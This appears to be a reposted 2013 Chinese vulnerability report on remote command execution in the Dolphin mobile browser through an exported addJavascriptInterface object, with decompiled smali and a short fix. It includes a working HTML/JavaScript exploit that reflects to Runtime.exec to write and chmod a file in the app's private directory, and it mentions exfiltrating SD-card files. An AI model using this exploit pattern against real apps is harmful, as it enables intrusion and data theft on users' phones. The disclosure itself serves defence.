海豚手机浏览器存在远程命令执行及修复

浏览:
字体:
发布时间:2013-12-09 23:23:32
来源:
海豚手机浏览器存在远程命令执行漏洞(js代码执行系统命令)
 
漏洞存在于海豚浏览器中,不需要root即可,addJavascriptInterface导出多处。
 
addJavascriptInterface导出到js中使用java类,可以反射导致命令执行等等利用
 
海豚浏览器,反编译后com/dolphin/browser/extension/RSSChecker.smali中,存在
 
const-string/jumbo v1, "dolphinRSSChecker"
 
 
 
 invoke-interface {p1, v0, v1}, Lcom/dolphin/browser/core/IWebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V
 
 
这里使用导出的dolphinRSSChecker,还有其他导出到js的java类也可以使用,海豚浏览器导出了多处,都注意下吧。
 
构造exploit部分内容如下:(html文件)
 
<script>function execute(cmdArgs){        alert(typeof(dolphinRSSChecker));        return dolphinRSSChecker.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);}              var content = "//xff//xff";var pathcontent = "/data/data/com.dolphin.browser.xf/files/neirong"; execute(["/system/bin/sh","-c","echo '"+content+"' > " + pathcontent]);execute(["chmod","755",pathcontent]);//execute([patharm,"f",upload]);</script>

 

 
构造上述内容调用后可以执行命令,可以做很多事情,例如上传sd卡文件,上传私有目录下的可读文件、删除文件等等。
 
 
 
访问带有测试js代码的网站
 
 
利用系统bash直接echo一个wooyun文件
 


成功,证明可以执行系统命令!
修复方案:
限制导出类给js使用,或者对导出要做一些判断,防止恶意使用
>更多相关文章
24小时热门资讯
24小时回复排行
资讯 | QQ | 安全 | 编程 | 数据库 | 系统 | 网络 | 考试 | 站长 | 关于东联 | 安全雇佣 | 搞笑视频大全 | 微信学院 | 视频课程 |
关于我们 | 联系我们 | 广告服务 | 免责申明 | 作品发布 | 网站地图 | 官方微博 | 技术培训
Copyright © 2007 - 2024 Vm888.Com. All Rights Reserved
粤公网安备 44060402001498号 粤ICP备19097316号 请遵循相关法律法规
');})();